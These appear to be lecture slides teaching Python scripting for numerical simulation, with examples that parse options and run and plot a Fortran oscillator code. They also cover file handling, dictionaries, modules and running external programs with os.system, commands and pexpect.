In [3]: my<TABKEY>
In [3]: my_variable_with_a_very_long_name
You can increase your typing speed with TAB completion! |

In [1]:f = open('datafile', 'r')
IOError: [Errno 2] No such file or directory: 'datafile'
In [2]:f = open('.datatrans_infile', 'r')
In [3]:from py4cs.filetable import read_columns
In [4]:x, y = read_columns(f)
In [5]:x
Out[5]:array([ 0.1, 0.2, 0.3, 0.4])
In [6]:y
Out[6]:array([ 1.1 , 1.8 , 2.22222, 1.8 ])

![]() | Scripts can be run from IPython:
In [1]:run scriptfile arg1 arg2 ...
e.g.,
In [1]:run datatrans2.py .datatrans_infile tmp1 |
![]() | IPython is integrated with Python's pdb debugger |
![]() | pdb can be automatically invoked when an exception occurs:
In [29]:%pdb on  # invoke pdb automatically
In [30]:run datatrans2.py infile tmp2 |

![]() | This happens when the infile name is wrong:
/home/work/scripting/src/py/intro/datatrans2.py
7 print "Usage:",sys.argv[0], "infile outfile"; sys.exit(1)
8
----> 9 ifile = open(infilename, 'r') # open file for reading
10 lines = ifile.readlines() # read file into list of lines
11 ifile.close()
IOError: [Errno 2] No such file or directory: 'infile'
> /home/work/scripting/src/py/intro/datatrans2.py(9)?()
-> ifile = open(infilename, 'r') # open file for reading
(Pdb) print infilename
infile
|

![]() | Pure Python: 4s |
![]() | Pure Perl: 3s |
![]() | Pure Tcl: 11s |
![]() | Pure C (fscanf/fprintf): 1s |
![]() | Pure C++ (iostream): 3.6s |
![]() | Pure C++ (buffered streams): 2.5s |
![]() | Numerical Python modules: 2.2s (!) |

![]() | The results reflect general trends |
![]() | Unfair test? Scripts use split on each line, C/C++ reads numbers consecutively |
![]() | 100 000 data points would be stored in binary format in a real application, resulting in much smaller differences between the implementations |

![]() | Simple, classical Unix shell scripts are widely used to replace sequences of operating system commands |
![]() | Typical application in numerical simulation: run a simulation program, then run a visualization program |
![]() | Programs are supposed to run in batch |
![]() | We want to make such a gluing script in Python |

![]() | Parsing command-line options:
somescript -option1 value1 -option2 value2 |
![]() | Removing and creating directories |
![]() | Writing data to file |
![]() | Running applications (stand-alone programs) |



Code: oscillator (written in Fortran 77)

![]() | Input: m, b, c, and so on read from standard input |
![]() | How to run the code:
oscillator < file
where file can be
3.0
0.04
1.0
...
(i.e., values of m, b, c, etc.) |
![]() | Results (t, y(t)) in sim.dat |



![]() | Commands:
set title 'case: m=3 b=0.7 c=1 f(y)=y A=5 ...';
# screen plot: (x,y) data are in the file sim.dat
plot 'sim.dat' title 'y(t)' with lines;
# hardcopies:
set size ratio 0.3 1.5, 1.0;
set term postscript eps mono dashed 'Times-Roman' 28;
set output 'case.ps';
plot 'sim.dat' title 'y(t)' with lines;
# make a plot in PNG format as well:
set term png small;
set output 'case.png';
plot 'sim.dat' title 'y(t)' with lines; |
![]() | Commands can be given interactively or put in a file |

![]() | Change oscillating system parameters by editing the simulator input file |
![]() | Run simulator:
oscillator < inputfile |
![]() | Plot:
gnuplot -persist -geometry 800x200 case.gp |
![]() | Plot annotations must be consistent with inputfile |
![]() | Let's automate! |

![]() | Usage:
./simviz1.py -m 3.2 -b 0.9 -dt 0.01 -case run1
Sensible default values for all options |
![]() | Put simulation and plot files in a subdirectory (specified by -case run1) |

![]() | Set default values of m, b, c etc. |
![]() | Parse command-line options (-m, -b etc.) and assign new values to m, b, c etc. |
![]() | Create and move to subdirectory |
![]() | Write input file for the simulator |
![]() | Run simulator |
![]() | Write Gnuplot commands in a file |
![]() | Run Gnuplot |

![]() | Set default values of the script's input parameters:
m = 1.0; b = 0.7; c = 5.0; func = 'y'; A = 5.0; w = 2*math.pi; y0 = 0.2; tstop = 30.0; dt = 0.05; case = 'tmp1'; screenplot = 1 |
![]() | Examine command-line options in sys.argv:
# read variables from the command line, one by one:
while len(sys.argv) >= 2:
    option = sys.argv[1]; del sys.argv[1]
    if option == '-m':
        m = float(sys.argv[1]); del sys.argv[1]
    ...
Note: sys.argv[1] is text, but we may want a float for numerical operations
|
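The manual parsing loop can be written generically so that every option is handled by the same two lines. This is a Python 3 sketch under stated assumptions: the function name `parse_options` and the dictionary of defaults are hypothetical, and each option name is taken to equal the variable name with a leading dash, as in `-m` and `-case`.

```python
def parse_options(argv, defaults):
    """Return a copy of defaults updated from options like -m 3.2 -case run1."""
    values = dict(defaults)
    args = list(argv[1:])              # leave the caller's list untouched
    while len(args) >= 2:              # a trailing option without value is ignored
        option = args.pop(0)
        name = option.lstrip('-')
        if name not in values:
            raise ValueError('unknown option ' + option)
        # the command line holds text: convert to the type of the default
        values[name] = type(values[name])(args.pop(0))
    return values

defaults = {'m': 1.0, 'b': 0.7, 'dt': 0.05, 'case': 'tmp1'}
argv = ['simviz1.py', '-m', '3.2', '-b', '0.9', '-dt', '0.01', '-case', 'run1']
p = parse_options(argv, defaults)
print(p)
```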

![]() | Python offers two modules for command-line argument parsing: getopt and optparse |
![]() | These accept short options (-m) and long options (--mass) |
![]() | getopt examines the command line and returns pairs of options and values (('--mass', '2.3')) |
![]() | optparse is a bit more comprehensive to use and makes the command-line options available as attributes in an object |
![]() | See exercises for extending simviz1.py with (e.g.) getopt |
![]() | In this introductory example we rely on manual parsing since this exemplifies basic Python programming |
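For comparison, a sketch of the same kind of parsing with the standard `getopt` module, written for Python 3. The long option names `--damping` and `--case` are assumptions chosen for the illustration; only `--mass` appears in the slides.

```python
import getopt

def parse_with_getopt(args):
    m = 1.0; b = 0.7; case = 'tmp1'             # default values
    # 'm:b:' means that the short options -m and -b take a value;
    # 'mass=' etc. are long options that take a value
    options, rest = getopt.getopt(args, 'm:b:', ['mass=', 'damping=', 'case='])
    for option, value in options:
        if option in ('-m', '--mass'):
            m = float(value)                    # values arrive as text
        elif option in ('-b', '--damping'):
            b = float(value)
        elif option == '--case':
            case = value
    return m, b, case

result = parse_with_getopt(['--mass', '2.3', '-b', '0.9', '--case', 'run1'])
print(result)
```

In a script the argument would be `sys.argv[1:]`; unknown options make `getopt.getopt` raise `getopt.GetoptError`.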

![]() | Python has a rich cross-platform operating system (OS) interface |
![]() | Skip Unix- or DOS-specific commands; do all OS operations in Python! |
![]() | Safe creation of a subdirectory:
dir = case  # subdirectory name
import os, shutil
if os.path.isdir(dir):  # does dir exist?
    shutil.rmtree(dir)  # yes, remove old files
os.mkdir(dir)  # make dir directory
os.chdir(dir)  # move to dir
|
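The directory handling can be tried safely in a scratch area. In this Python 3 sketch the function name `make_clean_dir` and the file `old.dat` are made up; `tempfile.mkdtemp` provides a temporary parent directory so that nothing in your own directories is removed.

```python
import os
import shutil
import tempfile

def make_clean_dir(dirname):
    """Create dirname; remove an old directory of the same name first."""
    if os.path.isdir(dirname):
        shutil.rmtree(dirname)
    os.mkdir(dirname)

start = os.getcwd()
os.chdir(tempfile.mkdtemp())       # work in a scratch area
make_clean_dir('run1')
open(os.path.join('run1', 'old.dat'), 'w').close()   # simulate old results
make_clean_dir('run1')             # second call removes old.dat
remaining = os.listdir('run1')
print(remaining)
os.chdir(start)                    # go back to where we started
```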

f = open('%s.i' % case, 'w')
f.write("""
%(m)g
%(b)g
%(c)g
%(func)s
%(A)g
%(w)g
%(y0)g
%(tstop)g
%(dt)g
""" % vars())
f.close()
Note: triple-quoted string for multi-line output
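The `% vars()` construction inserts variables by name: `vars()` returns a dictionary of the variables in the current scope, and `%(m)g` picks the entry `m`. A reduced Python 3 sketch, with a hypothetical function `make_input` and only four of the parameters:

```python
def make_input(m=1.0, b=0.7, c=5.0, func='y'):
    # inside a function, vars() holds the local variables m, b, c, func
    return """\
%(m)g
%(b)g
%(c)g
%(func)s
""" % vars()

text = make_input(m=3.2)
print(text)
```

The backslash right after the opening quotes suppresses the initial newline, so the first value ends up on the first line.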

![]() | Stand-alone programs can be run as
os.system(command)
# examples:
os.system('myprog < input_file')
os.system('ls *') # bad, Unix-specific
|
![]() | Better: get failure status and output from the command
cmd = 'oscillator < %s.i' % case  # command to run
import commands
failure, output = commands.getstatusoutput(cmd)
if failure:
    print 'running the oscillator code failed'
    print output
    sys.exit(1)
|

![]() | Make Gnuplot script:
f = open(case + '.gnuplot', 'w')
f.write("""
set title '%s: m=%g b=%g c=%g f(y)=%s A=%g ...';
...
""" % (case,m,b,c,func,A,w,y0,dt,case,case))
...
f.close()
|
![]() | Run Gnuplot:
cmd = 'gnuplot -geometry 800x200 -persist ' \
+ case + '.gnuplot'
failure, output = commands.getstatusoutput(cmd)
if failure:
print 'running gnuplot failed'; print output; sys.exit(1)
|

![]() | A script like our simviz1.py is traditionally written as a Unix shell script |
![]() | What are the advantages of using Python here?
|

![]() | It is easy to replace Gnuplot by another plotting program |
![]() | Matlab, for instance:
f = open(case + '.m', 'w') # write to Matlab M-file
# (the character % must be written as %% in printf-like strings)
f.write("""
load sim.dat %% read sim.dat into sim matrix
plot(sim(:,1),sim(:,2)) %% plot 1st column as x, 2nd as y
legend('y(t)')
title('%s: m=%g b=%g c=%g f(y)=%s A=%g w=%g y0=%g dt=%g')
outfile = '%s.ps'; print('-dps', outfile) %% ps BW plot
outfile = '%s.png'; print('-dpng', outfile) %% png color plot
""" % (case,m,b,c,func,A,w,y0,dt,case,case))
if screenplot: f.write('pause(30)\n')
f.write('exit\n'); f.close()
if screenplot:
cmd = 'matlab -nodesktop -r ' + case + ' > /dev/null &'
else:
cmd = 'matlab -nodisplay -nojvm -r ' + case
failure, output = commands.getstatusoutput(cmd)
|

![]() | Suppose we want to run a series of experiments with different m values |
![]() | Put a script on top of simviz1.py,
./loop4simviz1.py m_min m_max dm \
[options as for simviz1.py]
having a loop over m and calling simviz1.py inside the loop
|
![]() | Each experiment is archived in a separate directory |
![]() | That is, loop4simviz1.py controls the -m and -case options to simviz1.py |

![]() | The first three arguments define the m values:
try:
m_min = float(sys.argv[1])
m_max = float(sys.argv[2])
dm = float(sys.argv[3])
except:
print 'Usage:',sys.argv[0],\
'm_min m_max m_increment [ simviz1.py options ]'
sys.exit(1)
|
![]() | Pass the rest of the arguments, sys.argv[4:], to simviz1.py |
![]() | Problem: sys.argv[4:] is a list, we need a string
['-b','5','-c','1.1'] -> '-b 5 -c 1.1' |

![]() | ' '.join(list) can make a string out of the list list, with a blank between
each item
simviz1_options = ' '.join(sys.argv[4:]) |
![]() | Example:
./loop4simviz1.py 0.5 2 0.5 -b 2.1 -A 3.6
results in
m_min: 0.5
m_max: 2.0
dm: 0.5
simviz1_options = '-b 2.1 -A 3.6' |

![]() | Cannot use
for m in range(m_min, m_max, dm):
because range works with integers only |
![]() | A while-loop is appropriate:
m = m_min
while m <= m_max:
case = 'tmp_m_%g' % m
s = 'python simviz1.py %s -m %g -case %s' % \
(simviz1_options,m,case)
failure, output = commands.getstatusoutput(s)
m += dm
(Note: our -m and -case will override any -m or
-case option provided by the user)
|
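One caveat with the while-loop above: repeatedly adding dm accumulates round-off, so the last value can be skipped when m ends up slightly larger than m_max. A possible alternative, sketched here in Python 3, computes each value from an integer counter. The function name m_values and the tolerance 1e-9 are assumptions for this example.

```python
import math

def m_values(m_min, m_max, dm):
    """Return [m_min, m_min+dm, ...] with all values <= m_max (up to round-off)."""
    # small tolerance so round-off in the division does not drop the end point
    n = int(math.floor((m_max - m_min)/dm + 1e-9))
    return [m_min + i*dm for i in range(n + 1)]

# the accumulating while-loop, for comparison
accumulated = []
m = 0.0
while m <= 0.3:
    accumulated.append(m)
    m += 0.1

# the accumulating loop misses the end point here, the counter version does not
print(len(accumulated), len(m_values(0.0, 0.3, 0.1)))
```

For the increments used in the slides (such as 0.5) the while-loop is exact, so the difference only shows up for increments like 0.1 that have no exact binary representation.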

![]() | Many runs can be handled; need a way to browse the results |
![]() | Idea: collect all plots in a common HTML file:
html = open('tmp_mruns.html', 'w')
html.write('<HTML><BODY BGCOLOR="white">\n')
m = m_min
while m <= m_max:
case = 'tmp_m_%g' % m
cmd = 'python simviz1.py %s -m %g -case %s' % \
(simviz1_options, m, case)
failure, output = commands.getstatusoutput(cmd)
html.write('<H1>m=%g</H1> <IMG SRC="%s">\n' \
% (m,os.path.join(case,case+'.png')))
m += dm
html.write('</BODY></HTML>\n')
|

![]() | For compact printing a PostScript file with small-sized versions of all the plots is useful |
![]() | epsmerge (Perl script) is an appropriate tool:
# concatenate file1.ps, file2.ps, and so on to
# one single file figs.ps, having pages with
# 3 rows with 2 plots in each row (-par preserves
# the aspect ratio of the plots)
epsmerge -o figs.ps -x 2 -y 3 -par \
file1.ps file2.ps file3.ps ...
|
![]() | Can use this technique to make a compact report of the generated PostScript files for easy printing |

psfiles = [] # plot files in PostScript format
...
while m <= m_max:
case = 'tmp_m_%g' % m
...
psfiles.append(os.path.join(case,case+'.ps'))
...
...
s = 'epsmerge -o tmp_mruns.ps -x 2 -y 3 -par ' + \
' '.join(psfiles)
failure, output = commands.getstatusoutput(s)

![]() | When we vary m, wouldn't it be nice to see progressive plots put together in a movie? |
![]() | Can combine the PNG files together in an animated GIF file:
convert -delay 50 -loop 1000 -crop 0x0 \
plot1.png plot2.png plot3.png plot4.png ... movie.gif
animate movie.gif # or display movie.gif
(convert and animate are ImageMagick tools)
|
![]() | Collect all PNG filenames in a list and join the list items (as in the generation of the ps-file report) |

![]() | Enable loops over an arbitrary parameter (not only m)
# easy:
'-m %g' % m
# is replaced with
'-%s %s' % (str(prm_name), str(prm_value))
# prm_value plays the role of the m variable
# prm_name ('m', 'b', 'c', ...) is read as input
|
![]() | Keep the range of the y axis fixed (for movie) |
![]() | Files:
simviz1.py : run simulation and visualization
simviz2.py : additional option for yaxis scale
loop4simviz1.py : m loop calling simviz1.py
loop4simviz2.py : loop over any parameter in
simviz2.py and make movie
|

![]() | Study the impact of increasing the mass:
./loop4simviz2.py m 0.1 6.1 0.5 -yaxis -0.5 0.5 -noscreenplot |
![]() | Study the impact of a nonlinear spring:
./loop4simviz2.py c 5 30 2 -yaxis -0.7 0.7 -b 0.5 \
-func siny -noscreenplot
|
![]() | Study the impact of increasing the damping:
./loop4simviz2.py b 0 2 0.25 -yaxis -0.5 0.5 -A 4
(loop over b, from 0 to 2 in steps of 0.25) |

![]() | Reports:
tmp_c.gif # animated GIF (movie)
animate tmp_c.gif
tmp_c_runs.html # browsable HTML document
tmp_c_runs.ps # all plots in a ps-file |
![]() | All experiments are archived in a directory with a filename reflecting the varying parameter:
tmp_m_2.1 tmp_b_0 tmp_c_29 |
![]() | All generated files/directories start with tmp so it is easy to clean up hundreds of experiments |
![]() | Try the listed loop4simviz2.py commands!! |

![]() | Make a summary report with the equation, a picture of the system, the command-line arguments, and a movie of the solution |
![]() | Make a link to a detailed report with plots of all the individual experiments |
![]() | Demo:
./loop4simviz2_2html.py m 0.1 6.1 0.5 -yaxis -0.5 0.5 -noscreenplot
ls -d tmp_*
mozilla tmp_m_summary.html |

![]() | Archiving of experiments and having a system for uniquely relating input data to visualizations or result files are fundamental for reliable scientific investigations |
![]() | The experiments can easily be reproduced |
![]() | New (large) sets of experiments can be generated |
![]() | We make tailored tools for investigating results |
![]() | All these items contribute to increased quality of numerical experimentation |

![]() | Input file with time series data:
some comment line
1.5
measurements model1 model2
0.0 0.1 1.0
0.1 0.1 0.188
0.2 0.2 0.25
Contents: comment line, time step, headings, time series data
|
![]() | Goal: split file into two-column files, one for each time series |
![]() | Script: interpret input file, split text, extract data and write files |

![]() | The model1.dat file, arising from column no 2,
becomes
0 0.1
1.5 0.1
3 0.2 |
![]() | The time step parameter, here 1.5, is used to generate the first column |

![]() | Read inputfile name (1st command-line arg.) |
![]() | Open input file |
![]() | Read and skip the 1st (comment) line |
![]() | Extract time step from the 2nd line |
![]() | Read time series names from the 3rd line |
![]() | Make a list of file objects, one for each time series |
![]() | Read the rest of the file, line by line:
|

![]() | Reading and writing files |
![]() | Sublists |
![]() | List of file objects |
![]() | Dictionaries |
![]() | Arrays of numbers |
![]() | List comprehension |
![]() | Refactoring a flat script as functions in a module |

![]() | Open file and read comment line:
infilename = sys.argv[1]
ifile = open(infilename, 'r') # open for reading
line = ifile.readline() |
![]() | Read time step from the next line:
dt = float(ifile.readline()) |
![]() | Read next line containing the curvenames:
ynames = ifile.readline().split() |

![]() |
Make a list of file objects for output of each time series:
outfiles = []
for name in ynames:
outfiles.append(open(name + '.dat', 'w'))
|

![]() |
Read each line, split into y values, write to output files:
t = 0.0 # t value
# read the rest of the file line by line:
while 1:
line = ifile.readline()
if not line: break
yvalues = line.split()
# skip blank lines:
if len(yvalues) == 0: continue
for i in range(len(outfiles)):
outfiles[i].write('%12g %12.5e\n' % \
(t, float(yvalues[i])))
t += dt
for file in outfiles:
file.close()
|

![]() | Dictionary = array with a text as index |
![]() | Also called hash or associative array in other languages |
![]() | Can store 'anything':
prm['damping'] = 0.2 # number
def x3(x):
return x*x*x
prm['stiffness'] = x3 # function object
prm['model1'] = [1.2, 1.5, 0.1] # list object
|
![]() | The text index is called key |

![]() |
Could store the time series in memory as a dictionary of lists; the list items are the y values and the y names are the keys
y = {} # declare empty dictionary
# ynames: names of y curves
for name in ynames:
y[name] = [] # for each key, make empty list
lines = ifile.readlines() # list of all lines
...
for line in lines[3:]:
yvalues = [float(x) for x in line.split()]
i = 0 # counter for yvalues
for name in ynames:
y[name].append(yvalues[i]); i += 1
|

![]() | Specifying a sublist, e.g., the 4th line until the last line: lines[3:]
Transforming all words in a line to floats:
yvalues = [float(x) for x in line.split()]
# same as
numbers = line.split()
yvalues = []
for s in numbers:
yvalues.append(float(s))
|

![]() | The input file
some comment line
1.5
measurements model1 model2
0.0 0.1 1.0
0.1 0.1 0.188
0.2 0.2 0.25
results in the following y dictionary:
'measurements': [0.0, 0.1, 0.2],
'model1': [0.1, 0.1, 0.2],
'model2': [1.0, 0.188, 0.25]
(this output is plain print: print y) |

![]() | Fortran/C programmers tend to think of indices as integers |
![]() | Scripters make heavy use of dictionaries and text-type indices (keys) |
![]() | Python dictionaries can use (almost) any object as key (!) |
![]() | A dictionary is also often called hash (e.g. in Perl) or associative array |
![]() | Examples will demonstrate their use |

![]() | The previous script is ``flat'' (start at top, run to bottom) |
![]() | Parts of it may be reusable |
![]() | We may like to load data from file, operate on data, and then dump data |
![]() | Let's refactor the script:
|

def load_data(filename):
f = open(filename, 'r'); lines = f.readlines(); f.close()
dt = float(lines[1])
ynames = lines[2].split()
y = {}
for name in ynames: # make y a dictionary of (empty) lists
y[name] = []
for line in lines[3:]:
yvalues = [float(yi) for yi in line.split()]
if len(yvalues) == 0: continue # skip blank lines
for name, value in zip(ynames, yvalues):
y[name].append(value)
return y, dt

![]() | Note: the function returns two (!) values; a dictionary of lists, plus a float |
![]() | It is common that output data from a Python function are returned, and multiple data structures can be returned (actually packed as a tuple, a kind of ``constant list'') |
![]() | Here is how the function is called:
y, dt = load_data('somedatafile.dat')
print y
Output from print y:
>>> y
{'tmp-model2': [1.0, 0.188, 0.25],
'tmp-model1': [0.10000000000000001, 0.10000000000000001,
0.20000000000000001],
'tmp-measurements': [0.0, 0.10000000000000001, 0.20000000000000001]}
|

![]() | C/C++/Java/Fortran-like iteration over two arrays/lists:
for i in range(len(list1)):
    e1 = list1[i]; e2 = list2[i]
    # work with e1 and e2
|
![]() | Pythonic version:
for e1, e2 in zip(list1, list2):
# work with element e1 from list1 and e2 from list2
For example,
for name, value in zip(ynames, yvalues):
y[name].append(value)
|
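A small runnable sketch of the zip idiom, written for Python 3, with sample data taken from the first data line of the input file shown earlier. It also shows enumerate, which is a common choice when the index itself is needed; that addition is not part of the slides.

```python
ynames = ['measurements', 'model1', 'model2']
yvalues = [0.0, 0.1, 1.0]

y = {name: [] for name in ynames}      # dictionary of empty lists

# visit the two lists in parallel
for name, value in zip(ynames, yvalues):
    y[name].append(value)

# enumerate supplies the index when it is really needed
for i, name in enumerate(ynames):
    print(i, name, y[name])

# zip stops at the end of the shortest sequence
pairs = list(zip([1, 2, 3], 'ab'))
```

Because zip silently stops at the shortest input, a line with too few numbers would go unnoticed; checking the lengths first is one way to guard against that.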

def dump_data(y, dt):
# write out 2-column files with t and y[name] for each name:
for name in y.keys():
ofile = open(name+'.dat', 'w')
for k in range(len(y[name])):
ofile.write('%12g %12.5e\n' % (k*dt, y[name][k]))
ofile.close()

![]() | Our goal is to reuse load_data and dump_data, possibly with some operations on y in between:
from convert3 import load_data, dump_data
y, timestep = load_data('.convert_infile1')
from math import fabs
for name in y: # run through keys in y
maxabsy = max([fabs(yval) for yval in y[name]])
print 'max abs(y[%s](t)) = %g' % (name, maxabsy)
dump_data(y, timestep)
|
![]() | Then we need to make a module convert3! |

![]() | Collect the functions in the module in a file, here the file is called convert3.py |
![]() | We have then made a module convert3 |
![]() | The usage is as exemplified on the previous slide |

![]() | The scripts convert1.py and convert2.py load and dump data - this functionality can be reproduced by an application script using convert3 |
![]() | The application script can be included in the module:
if __name__ == '__main__':
import sys
try:
infilename = sys.argv[1]
except:
usage = 'Usage: %s infile' % sys.argv[0]
print usage; sys.exit(1)
y, dt = load_data(infilename)
dump_data(y, dt)
|
![]() | If the module file is run as a script, the if test is true and the application script is run |
![]() | If the module is imported in a script, the if test is false and no statements are executed |

![]() | As script:
unix> ./convert3.py someinputfile.dat |
![]() | As module:
import convert3
y, dt = convert3.load_data('someinputfile.dat')
# do more with y?
convert3.dump_data(y, dt)
|
![]() | The application script at the end also serves as an example of how to use the module |

![]() | Construct an example on the functionality of the script, if that is not included in the problem description |
![]() | Write very high-level pseudo code with words |
![]() | Scan known examples for constructions and functionality that can come into use |
![]() | Look up man pages, reference manuals, FAQs, or textbooks for functionality you have minor familiarity with, or to clarify syntax details |
![]() | Search the Internet if the documentation from the latter point does not provide sufficient answers |

![]() | Exercise: Write a function myjoin that concatenates a list of strings to a single string, with a specified delimiter between the list elements. That is, myjoin is supposed to be an implementation of a string's join method in terms of basic string operations. |
![]() | Functionality:
s = myjoin(['s1', 's2', 's3'], '*') # s becomes 's1*s2*s3' |

![]() | Pseudo code:
function myjoin(list, delimiter)
joined = first element in list
for element in rest of list:
concatenate joined, delimiter and element
return joined
|
![]() | Known examples: string concatenation (+ operator) from hw.py, list indexing (list[0]) from datatrans1.py, sublist extraction (list[1:]) from convert1.py, function construction from datatrans1.py |

def myjoin(list, delimiter):
joined = list[0]
for element in list[1:]:
joined += delimiter + element
return joined
That's it!
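The version above raises an IndexError for an empty list, since list[0] does not exist. A slightly more defensive sketch (Python 3 syntax) is shown below; the parameter name strings replaces list only to avoid shadowing the built-in type, and the empty-list behavior is chosen to mirror the built-in join method.

```python
def myjoin(strings, delimiter):
    """Concatenate the items in strings, with delimiter between them."""
    if not strings:          # empty list: nothing to join
        return ''
    joined = strings[0]
    for element in strings[1:]:
        joined += delimiter + element
    return joined

s = myjoin(['s1', 's2', 's3'], '*')
print(s)
```

A quick check against the built-in method, '*'.join(['s1', 's2', 's3']), is a convenient way to test such an exercise.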

![]() | Use comments to explain ideas |
![]() | Use descriptive variable names to reduce the need for more comments |
![]() | Find generic solutions (unless the code size explodes) |
![]() | Strive for compact code, but not too compact |
![]() | Invoke the Python interpreter and run import this |
![]() | Always construct a running example that demonstrates the script, and include it in
the source code file inside a triple-quoted string:
"""
unix> python hw.py 3.1459
Hello, World! sin(3.1459)=-0.00430733309102
""" |

![]() | Here is a suitable command for printing exercises for a week:
unix> a2ps --line-numbers=1 -4 -o outputfile.ps *.py
This prints all *.py files, with 4 (because of -4) pages per sheet |
![]() | See man a2ps for more info about this command |
![]() | In every exercise you also need examples on how a script is run and what the output is -- one recommendation is to put all this info (cut from the terminal window and pasted in your editor) in a triple double quoted Python string (such a string can be viewed as example/documentation/comment as it does not affect the behavior of the script) |


![]() | running an application |
![]() | file reading and writing |
![]() | list and dictionary operations |
![]() | splitting and joining text |
![]() | basics of Python classes |
![]() | writing functions |
![]() | file globbing, testing file types |
![]() | copying and renaming files, creating and moving to directories, creating directory paths, removing files and directories |
![]() | directory tree traversal |
![]() | parsing command-line arguments |

![]() | pydoc somemodule.somefunc, pydoc somemodule |
![]() | doc.html! Links to lots of electronic information |
![]() | The Python Library Reference (go to the index) |
![]() | Python in a Nutshell |
![]() | Beazley's Python reference book |
![]() | Your favorite Python language book |

![]() | We frequently illustrate Python constructions in the interactive shell |
![]() | Recommended shells: IDLE or IPython |
![]() | Examples (using standard prompt, not default IPython look):
>>> t = 0.1
>>> def f(x):
... return math.sin(x)
...
>>> f(t)
0.099833416646828155
>>> os.path.splitext('/some/long/path/myfile.dat')
('/some/long/path/myfile', '.dat')
|
![]() | Help in the shell:
>>> help(os.path.splitext) |

| C and C++ programmers heavily utilize the ``C preprocessor'' for including files, excluding code blocks, defining constants, etc. | |
| preprocess is a (Python!) program that provides (most) ``C preprocessor'' functionality for Python, Perl, Ruby, shell scripts, makefiles, HTML, Java, JavaScript, PHP, Fortran, C, C++, ... (!) | |
| preprocess directives are typeset within comments | |
| Most important directives: include, if/ifdef/ifndef/else/endif, define | |
See pydoc preprocess for documentation
# #if defined('DEBUG') and DEBUG >= 2
# write out debug info at level 2:
...
# #elif DEBUG == 0
# write out minimal debug info:
...
# #else
# no debug output
# #endif
preprocess -DDEBUG=1 pyscript.p.py > pyscript.py
| |
| preprocess cannot do macros with arguments |

Include documentation or common code snippets in several files
# #include "myfile.py" | |
Exclude/include code snippets according to a variable (its value or
just whether the variable is defined)
# #ifdef MyDEBUG
....debug code....
# #endif | |
Define variables with optional value
# #define MyDEBUG
# #define MyDEBUG 2
Such preprocessor variables can also be defined on the command line
preprocess -DMyDEBUG=2 myscript.p.py > myscript.py | |
| Naming convention: .p.py files are input |

![]() | Run a stand-alone program:
cmd = 'myprog -c file.1 -p -f -q > res'
failure = os.system(cmd)
if failure:
    print '%s: running myprog failed' % sys.argv[0]
    sys.exit(1) |
![]() | Redirect output from the application to a list of lines:
pipe = os.popen(cmd)
output = pipe.readlines()
pipe.close()
for line in output:
    # process line |
| Better tool: the commands module (next slide) |

![]() | Best way to execute another program:
import commands
failure, output = commands.getstatusoutput(cmd)
if failure:
print 'Could not run', cmd; sys.exit(1)
for line in output.splitlines(): # or output.split('\n')
    # process line
(output holds the output as a string)
|
![]() | output holds both standard error and standard output (os.popen grabs only standard output so you do not see error messages) |
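The commands module exists only in Python 2. In Python 3 the subprocess module covers the same ground; the sketch below shows one way to obtain a failure status and the combined standard output and standard error. The helper name run is an assumption for this example, and the Python interpreter itself stands in for the program being run.

```python
import subprocess
import sys

def run(cmd_args):
    """Run a command given as a list; return (failure, output).

    output holds standard output and standard error merged together.
    """
    result = subprocess.run(cmd_args,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT,
                            universal_newlines=True)
    return result.returncode, result.stdout

# a command that succeeds
failure, output = run([sys.executable, '-c', 'print("hello")'])
for line in output.splitlines():
    print('got:', line)

# a command that fails with exit status 3
failure2, output2 = run([sys.executable, '-c', 'import sys; sys.exit(3)'])
```

Passing the command as a list avoids shell quoting issues; redirections such as `< input_file` then have to be expressed through the stdin argument instead of in the command string.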

![]() | os.system, pipes, and commands.getstatusoutput return only after the command has terminated |
![]() | There are two methods for running the script in parallel with the command:
| ||||
![]() | More info: see ``Platform-dependent operations'' slide and the threading module |

![]() | Open (in a script) a dialog with an interactive program:
gnuplot = os.popen('gnuplot -persist', 'w')
gnuplot.write("""
set xrange [0:10]; set yrange [-2:2]
plot sin(x)
quit
""")
gnuplot.close() # gnuplot is now run with the written input
|
![]() | Same as "here documents" in Unix shells:
gnuplot <<EOF set xrange [0:10]; set yrange [-2:2] plot sin(x) quit EOF |

![]() | There are popen modules that allow two-way communication with an application (read/write), but this technique is not suitable for a reliable two-way dialog (it is easy to get hang-ups) |
![]() | The pexpect module is the right tool for a two-way dialog with a stand-alone application
# copy files to remote host via scp and password dialog
cmd = 'scp %s %s@%s:%s' % (filename, user, host, directory)
import pexpect
child = pexpect.spawn(cmd)
child.expect('password:')
child.sendline('&%$hQxz?+MbH')
child.expect(pexpect.EOF) # important; wait for end of scp session
child.close()
|
Complete example: simviz1.py version that runs oscillator
on a remote machine (``supercomputer'') via pexpect:
src/py/examples/simviz/simviz1_ssh_pexpect.py |

![]() | Load a file into list of lines:
infilename = '.myprog.cpp'
infile = open(infilename, 'r') # open file for reading
# load file into a list of lines:
lines = infile.readlines()
# alternatively, load file into a string
# (use instead of readlines; a second read returns nothing):
filestr = infile.read() |
![]() | Line-by-line reading (for large files):
while 1:
line = infile.readline()
if not line: break
# process line
|
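File objects can also be iterated over directly, which reads one line at a time just like the readline loop above. A minimal sketch in Python 3 follows; the function count_nonblank_lines and the temporary demo file are made up for this example.

```python
import os
import tempfile

def count_nonblank_lines(filename):
    """Read the file line by line and count lines with visible content."""
    count = 0
    with open(filename, 'r') as infile:   # the file is closed automatically
        for line in infile:               # one line at a time
            if line.strip():
                count += 1
    return count

# small demonstration with a temporary file
tmp = tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False)
tmp.write('first line\n\nthird line\n')
tmp.close()
n = count_nonblank_lines(tmp.name)
os.remove(tmp.name)
print(n)
```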

![]() | Open a new output file:
outfilename = '.myprog2.cpp'
outfile = open(outfilename, 'w')
outfile.write('some string\n')
|
![]() | Append to existing file:
outfile = open(outfilename, 'a')
outfile.write('....')
|

| Numbers: float, complex, int (+ bool) | |
| Sequences: list, tuple, str, NumPy arrays | |
| Mappings: dict (dictionary/hash) | |
| Instances: user-defined class | |
| Callables: functions, callable instances |

![]() |
Python distinguishes between strings and numbers:
b = 1.2 # b is a number
b = '1.2' # b is a string
a = 0.5 * b # illegal: b is NOT converted to float
a = 0.5 * float(b) # this works |
![]() | All Python objects are compared with
== != < > <= >= |

![]() | Consider:
b = '1.2'
if b < 100: print b, '< 100'
else: print b, '>= 100'
What do we test? string less than number! |
![]() | What we want is
if float(b) < 100: # floating-point number comparison
# or
if b < str(100): # string comparison |
